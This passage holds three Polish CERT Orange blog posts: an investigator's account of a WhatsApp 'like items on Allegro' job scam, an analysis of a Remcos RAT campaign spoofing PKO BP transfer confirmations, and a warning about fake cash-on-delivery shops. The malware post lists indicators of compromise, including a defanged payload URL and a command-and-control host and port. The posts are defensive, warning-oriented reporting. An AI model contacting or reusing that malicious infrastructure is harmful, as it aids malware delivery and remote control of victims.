Skontaktowałem się zatem za pośrednictwem WhatsApp pod podany numer. Tam po krótkiej rozmowie dowiedziałem się, że oferta pracy polega na „lajkowaniu” przedmiotów na Allegro. Jako dowodów rozmówca oczekiwał wysyłania zrzutów ekranu z serwisu aukcyjnego. Miały być na nich widoczne produkt oraz serduszko, oznaczające dodanie do ulubionych.

Na początku trochę marudziłem i dopytywałem, sprawdzając cierpliwość rozmówcy. W pewnym momencie zdarzyło mu się wkleić do rozmowy treść po francusku, którą po chwili skasował. Ciekawe, w ilu jeszcze językach oszust prowadził równoległe rozmowy? Przyglądając się dokładnie treściom po polsku zakładam, że w przypadku naszego języka używał gotowych skryptów.

Linki (zarówno ten podany na WhatsApp jak i pozostałe, o których napiszę później) prowadziły faktycznie do serwisu Allegro, a w moim przypadku otwierały stronę produktu w aplikacji mobilnej. Polubiłem więc pierwszy produkt i wysłałem zrzut ekranu. W odpowiedzi rozmówca postawił przede mną kolejne zadanie:

Czyli wypłata mi się należy. By jednak ją otrzymać, muszę zrobić kolejny krok. Przejść spod kurateli werbownika na poziomie 1 pod opiekę „menedżera biznesowego”. W tym celu muszę zainstalować aplikację Telegram (i podać swój wiek). Rozmówca na WhatsApp mocno naciskał, by zrobić to szybko. Czyżby w kolejce czekali kolejni, których zainteresowała oferta pracy?

Co ciekawe, szybko okazało się, że „Marie” to niekoniecznie Marie. Po prostu obsługującemu mnie oszustowi musiało się trafić akurat zdjęcie kobiety i kobiece imię. Treść wypowiedzi mojego rozmówcy bezdyskusyjnie bowiem dowodziła, że rozmawiam z osobą płci męskiej, dla której język polski nie jest językiem natywnym. Ale póki co, po pierwszym kontakcie z „Marie” musiałem jeszcze podać dane do przelewu pierwszej wypłaty. Kolejne zadania miały na mnie czekać od rana.

Oferta pracy? Ciesz się życiem na Telegramie, klikaj lajki na Allegro

Przelew faktycznie przyszedł (i od razu został zgłoszony odpowiednim służbom w banku). Dane nadawcy są ukryte, bowiem z dużym prawdopodobieństwem można założyć, że był nim inny ze „słupów”. W trakcie śledztwa miałem też do czynienia z kilkudziesięcioma innymi potwierdzeniami przelewów. Jako bank nadawcy dominowały Revolut i Santander, pojawiały się też PKO, czy mBank.

Kolejnego dnia rano „Marie” dodała mnie do grupy o optymistycznie brzmiącej nazwie „Ciesz się życiem”. Grupa okazała się być zabezpieczona nie tylko przed wykonywaniem zrzutów ekranu, ale także przed wyeksportowaniem archiwum! Na poniższych zdjęciach warto zwrócić uwagę na kilka rzeczy. Personalia członków grupy wydają się być losowane z bazy imion i nazwisk (Chwalibóg Spychalski zrobił wyjątkowe wrażenie). Treści ich wypowiedzi generuje skrypt. A prowadzący grupę… ostrzegają przed oszustami.

Grupa grupą, na mnie czekała oferta pracy, którą trzeba było wprowadzić w życie. Nudne i mozolne otwieranie kolejnych pozycji w Allegro, serduszkowanie, screenshotowanie, wysyłanie. I raz na jakiś czas potwierdzanie, że otrzymałem kolejny przelew (mimo, iż był zatrzymywany zanim dotarł do celu). I tak zastanawiałem się, o co tu chodzi, aż nadeszło zadanie 10:

OK, udawać, że przyjmuję przelew to jedno. Wykonanie takiego przelewu to już jednak nie tylko naiwność – przecież nie wiadomo, czy dostanę przelew zwrotny. Znalazłem jednak pewien sposób, by przekonać „Marie”, że przelew pod podany adres wyszedł. Trick okazał się na tyle dobry, że oszust uwierzył. I (zapewne) odesłał przelew powiększony o kwotę podaną w zadaniu.

Ciągle Allegro, aż tu nagle… kryptowaluty

Pierwszy pełny „dzień pracy” udało się zakończyć. Gdybym faktycznie odbierał te przelewy, na moje konto trafiłoby nieco poniżej 200 złotych. Monotonię ciągłego klikania w Allegro przełamało nagle wrzucone przez „Marie” zadanie związane z… kryptowalutami. Po wysłaniu „menedżerowi sprzedaży” kolejnego zdjęcia z lajkiem dostałem niespodziewanie polecenie założenia konta na stronie udającej giełdę kryptowalut i skontaktowania się z „trenerką”.

„Trenerka” potrzebowała mój adres e-mail, numer telefonu, wiek i zawód. Po co? Jeśli nie wyjdzie przekręt to przynajmniej sprzeda/wykorzysta dane osobowe. Jej rola ograniczyła się do wyjaśnienia mi w co muszę klikać, żeby za kwotę widniejącą w pozycji PLN na moim koncie kupić BTC. Co ciekawe „menedżerka” podała mi inny adres do założenia konta, niż „trenerka” do aktywności.

Oszust poczuł się oszukany

Drugiego dnia niestety trafiła kosa na kamień. Choć w zasadzie powinna dzień wcześniej, bo wtedy miałem wykonać Zadanie 18 – kolejne, gdy to ja wysyłałem przelew, tym razem na 200 złotych – czego z różnych względów nie mogłem zrobić. „Marie” chciała mnie życzliwie przeprowadzić przez zadanie, ale tym razem nie doceniła moich umiejętności, które wykorzystałem w poprzedniej takiej sytuacji. Stawiam, że dlatego, iż kwota, która miała trafić na docelowe konto – o dziwo – nie znalazła się tam.

Prośby, błagania, groźby, sugestie ponownego spojrzenia na docelowe konto, że może wpłata się zagubiła, prośba o zaufanie do „wiernego pracownika”. Nic nie pomogło. Marie najpierw szukała błędów po swojej stronie, okazało się, że mogła pomylić nazwisko odbiorcy przelewu, więc… zwróciła mi pieniądze, które ja „wysłałem” jeszcze raz. Potem szukała winy po stronie banku, aż wreszcie zrozumiała, gdzie tkwi wina:

Próbujesz mnie oszukać! Jesteś oszustem!

Cóż – to ty zaczęłaś. Ja tylko dołączyłem do zabawy. I tym samym oferta pracy wygasła, a ja zostałem zwolniony. Czy żałuję? Początkowo trochę tak, bo liczyłem, że uda mi się ciągnąć narrację tak, by dotrzeć do momentu, gdy dowiem się o co tu naprawdę chodzi. Przeszła mi przez myśl pralnia pieniędzy, ale przy tak małych kwotach musiałaby to być olbrzymia liczba transakcji. Na pomoc przyszedł Facebook i grupy, zrzeszające tych, którzy niestety nie wiedzieli od początku, że to oszustwo…

Oferta pracy trwa tylko do dużego przelewu

Odpowiedź znajdujemy na grupie Oszustwa internetowe na Facebooku. Co jakiś czas pojawia się tam pytanie: „Czy ta oferta pracy wydaje się Wam wiarygodna?”. I o ile w komentarzach przewijają się podstawowe ostrzeżenia, w stylu by nie podawać w takich miejscach danych wrażliwych, pani Arleta zdecydowała się upublicznić to, co zdarzyło się jej, by ostrzec innych przed padnięciem ofiarą oszustwa (cytat oryginalny).

Praca miała polegać na laikowaniu reklam na YouTube, a później okazało się że trzeba inwestować z gwarancją zarobku… jak się okazało to ściema na początku przelewali grosze a później ukradli mi prawie 20000 zl…

Jak szybko dostałbym „zadanie” z przelewem na taką kwotę? Biorąc pod uwagę, że pierwszego dnia były to przelewy na 70 i następnie na 200 lub 500 PLN, myślę, że najpóźniej trzeciego dnia trafiłoby do mnie zadanie na 20 tysięcy, kuszące pewnie zarobkiem w wysokości 10 procent od tej kwoty. Wtedy oferta pracy by się skończyła, „Marie” by mnie zablokowała i zostałaby tylko frustracja z własnej zachłanności.

Jak ustrzec się takiego oszustwa?

Strzeż się WhatsAppa niosącego finansowe oferty! Po prostu nie ufaj obcym ludziom, piszącym do Ciebie ni z tego ni z owego na komunikatorze. Niektóre z mediów ostrzegających niedawno o analizowanym tutaj schemacie sugerowały, iż możemy mieć do czynienia z mutacją ataku „mamo/tato, telefon wpadł mi do sedesu”. Faktycznie jednak łączy je jedno – zaufanie obcej osobie na komunikatorze. Nie róbcie tego. Nie dajcie się oszukać.

Michał Rosiak

The post Oferta pracy przez WhatsApp? Tak oszuści wyłudzają pieniądze appeared first on CERT Orange.

Remcos RAT, najpopularniejszy szkodnik w naszej sieci, to tzw. trojan zdalnego dostępu (ang. Remote Access Trojan, RAT). Pozwala atakującemu na zdalne sterowanie i monitorowanie zainfekowanego systemu bez wiedzy użytkownika. Jego funkcje obejmują między innymi:

• dostęp do systemu plików, umożliwiający kopiowanie, przenoszenie, usuwanie lub kradzież danych
• zdalne wykonywanie poleceń i uruchamianie plików na zainfekowanym komputerze
• rejestrowanie naciśnięć klawiszy i zbieranie haseł, co umożliwia kradzież danych uwierzytelniających i innych wrażliwych informacji
• zbieranie zrzutów ekranu i obsługę kamery internetowej, co może służyć do monitorowania aktywności użytkownika i inwazji na prywatność

Dokładną techniczną analizę działania Remcos RAT znajdziesz tutaj.

Remcos regularnie trafia do CERT Orange Polska w formie kolejnych kampanii. Tym razem do polskich internautów dociera mail z tytułowego obrazka, podszywający się pod potwierdzenie przelewu.

Załącznik to faktycznie plik PDF, jednak po jego otwarciu zobaczymy… informację opatrzoną logo PKO BP z linkiem, sugerującym, że po jego kliknięciu otworzymy dwa dokumenty PDF.

W pliku ZIP znajdziemy dropper napisany w języku Visual Basic.

Zawartość skryptu droppera zawierała przypadkowe niepotrzebne komentarze, by utrudnić analizę i odczyt samego pliku i jego funkcji:

Po usunięciu komentarzy sytuacja robi się znacznie bardziej czytelna:

Powyższy kod służy do uruchomienia zakodowanego skryptu Powershell. Przygotowuje on payload przy użyciu manipulacji łańcuchami. Obfuskacja zmiennych i dynamiczna rekonstrukcja komend mają na celu uniknięcie wykrycia przez programy antywirusowe. Poniższy kod to zbudowany payload na podstawie pliku Upstage.vbs:

Komunikacja sieciowa pobierająca złośliwy kod:

Pobrana binarka to Remcos RAT, komunikujący się z serwerem Command&Control jak poniżej:

Instalacja złośliwego payloadu podłącza ofiarę do botnetu CleanRem. Powiązana nazwą z botnetem domena odpowiedzialna za serwer Command&Control pojawiła się w analizach CERT Orange Polska po raz pierwszy.

Indicators of Compromise

Dropper: Upstage.vbs 6f8ceeecb814f3dd8e42ce8b1163d604
Remcos payload: hxxps://www.transparenciaquillota[.]cl/
Command&Control: finalrem.duckdns[.]org:52190

The post PKO BP na celowniku przestępców – nowa kampania Remcos RAT appeared first on CERT Orange.

Media społecznościowe w założeniach miały być lepszym odzwierciedleniem otaczającego nas świata. Odzwierciedleniem w którym każdy z użytkowników będzie czuł się lepiej niż w rzeczywistości, gdzie nasze potrzeby będą w lepszym stopniu zaspokajane, a produkty łatwiej sprzedawane. Tyle teorii.

Być może jednak dostępność i zakres sprzedawanych produktów w wielu przypadkach przerosły wyobraźnię twórców. W mediach społecznościowych roi się od reklam, które nie powinny się tam znaleźć. I od oszustów, którzy próbują wykorzystać choćby to, że reklama wizualnie nie wyróżnia się z tłumu postów. Ale dziś akurat nie będzie o sklepach które kradną dane karty, zapisują na subskrypcje, czy podstawiają fałszywy numer konta i nie dostarczają towaru. Dziś będzie o oszustwie, gdzie towar jest … dostarczany i nikt nie traci danych wrażliwych.

Kim jesteś Ryanie?

Ale od początku (kilka przykładowych reklam z jednego dnia):

Co łączy powyższe reklamy? Zwróćmy uwagę na kilka cech charakterystycznych:

• nazwa domeny której w zasadzie nie da się przeczytać,
• „markowe” produkty (aż za bardzo)
• i co najważniejsze: płatność przy odbiorze

Weźmy przykładowe ogłoszenie:

Zobaczmy, kim jest Ryan. Na pierwszy rzut oka prawdopodobnie pochodzi z Wietnamu. Nie jest przesadnie popularnym sprzedawcą. I ma ładnego kota (albo – co bardziej prawdodobne – ściągnął zdjęcie zwierzaka z sieci).

Sprzedaje trochę różnych towarów na różne rynki (fragment):

Co jeśli chcemy kupić? Nic prostszego:

Wybieramy kolor, rozmiar, dane adresowe i voila, kupione. Nie ma żadnego BLIK-a, numeru karty czy banku. Bezpiecznie, bo za pobraniem.

Czy ta paczka rzeczywiście dotrze? Oczywiście – na tym polega to oszustwo.

Co w takim razie będzie w środku?

Przejrzenie forów w mediach społecznościowych (życie jednak jest przewrotne, nie sądzicie?) daje szybką odpowiedź na powyższe pytanie. W największym skrócie: dostaniecie coś, czego nie wzięlibyście do ręki na bazarze. Co ciekawe, to coś czasem rzeczywiście przypomina buty lub ubrania! Jednak określenie, że „jakość zdecydowanie nie licuje z ceną” po otwarciu paczki wydaje się być dużym niedopowiedzeniem.

Pierwsza myśl jaka większości nasuwa się, gdy zobaczymy to… coś, brzmi: „Muszę zwrócić ten towar jak najszybciej i odzyskać pieniądze!”. Jak? To dobre pytanie. Tym bardziej, że tu gdzie robiliśmy zakupy przeczytamy jedynie:

Zerknijmy może na zasady zwrotu z innej strony?

Jeśli anulujesz zamówienie w ciągu 24 godzin od zakupu, zostanie odjęte 1,5 USD. Jeśli zdecydujesz się anulować zamówienie, prześlij zgłoszenie pomocy „Skontaktuj się z nami”. W przypadku zamówień anulowanych 24 godziny po zakupie, ale przed wysyłką, obowiązuje opłata za anulowanie w wysokości 15%. Jeśli zamówienie zostało już wysłane, nie zaakceptujemy prośby o anulowanie.

Akceptujemy zwroty produktów, z wyjątkiem produktów z wyprzedaży końcowej i bielizny. Klienci mają prawo zażądać zwrotu w ciągu 15 dni od otrzymania produktu.
Aby kwalifikować się do zwrotu, przedmiot musi być nieużywany i w takim samym stanie, w jakim go otrzymałeś. Musi również znajdować się w oryginalnym opakowaniu. Aby dokonać zwrotu, Jasperbelly.com wymaga paragonu lub dowodu zakupu. Prosimy nie odsyłać zakupionego towaru do producenta. Opłata za wysyłkę zwrotną jest opłacana przez kupującego.

Po otrzymaniu i sprawdzeniu zwrotu wyślemy Ci wiadomość e-mail z informacją, że otrzymaliśmy zwrócony przedmiot. Powiadomimy Cię również o zatwierdzeniu lub odrzuceniu zwrotu. Jeśli zwrot zostanie zatwierdzony, zwrot zostanie przetworzony, a środki zostaną automatycznie zwrócone na Twoją kartę kredytową lub oryginalną metodę płatności w ciągu określonej liczby dni.

Jeśli jeszcze nie otrzymałeś zwrotu, najpierw sprawdź ponownie swoje konto bankowe.
Następnie skontaktuj się z firmą obsługującą Twoją kartę kredytową, może minąć trochę czasu, zanim Twój zwrot zostanie oficjalnie zaksięgowany. Następnie skontaktuj się ze swoim bankiem. Często mija trochę czasu na przetworzenie, zanim zwrot zostanie zaksięgowany. Jeśli zrobiłeś wszystko, co trzeba, a nadal nie otrzymałeś zwrotu, skontaktuj się z nami pod adresem service@obouvt[.]shop.

Czy czegoś się dowiedzieliśmy? Jedno jest pewne – kupowaliśmy na jasperbelly[.]com, a w „zasadach zwrotu” jest obouvt[.]shop. Nie wydają się mieć ze sobą wiele wspólnego, co nie brzmi optymistycznie.

Czyli można odesłać, tylko gdzie? Jeśli na stronie jest jakiś adres pocztowy to nie jest to adres do zwrotu:

Niechciana paczka – jak ją zwrócić?

Poszukajmy w sieci. Według internautów szybka (?) ścieżka wygląda następująco:

• piszemy na adres email w celu pozyskania adresu do zwrotu.
• po jakimś czasie otrzymujemy (lub nie) email z adresem np. w Honkgongu i kosztami przesyłki (które mamy ponieść my) rzędu 50$

Decydujesz się na zwrot paczki? OK, ale pamiętaj, że:

• nie masz już w ręku towaru
• nie masz pieniędzy zapłaconych jako pobranie
• płacisz sporą kwotę za opłacenie przesyłki w jakieś nieznane miejsce na drugiej półkuli

Ktoś się zdecyduje? Raczej nie.

Na jednym z poprzednich screenów widać, że grupy parające się tym procederem celują w kilka krajów jednocześnie. Przyjrzymy się jednak wyłącznie Polsce.

Wyszukiwarka reklam Meta na 2.4.2025 zwraca blisko 3,5 tysiąca aktywnych reklam. Teraz, gdy też jesteście uzbrojeni w tę wiedzę, możecie sami zajrzeć w wyszukiwarkę reklam i sprawdzić stan na teraz. Czy wszystkie te reklamy prowadzą do „fałszywych” sklepów? Zapewne nie. Ale z jakiegoś powodu jest ich aż tyle. Warto jeszcze zastanowić się nad klasyfikacją czynu. Czy kradną dane karty? Nie. Wyciągają do nas hasło do banku? Nie. Czy wysyłają towar? tak. Czy to phishing… ? Nawet jeśli pieniądze, które stracimy, nie są jednostkowo duże, zadziała efekt skali. A liczba aktywnych reklam dowodzi, że chętnych nie brakuje.

Znasz kogoś, kto może się na to złapać? Wyślij mu link do tego tekstu. Ostrzeż go. Napsuj krwi oszustom/cwaniakom/biznesmenom* (* – niepotrzebne skreślić).

The post Nowe oszustwo na fałszywy sklep? To dlaczego paczka dotarła? appeared first on CERT Orange.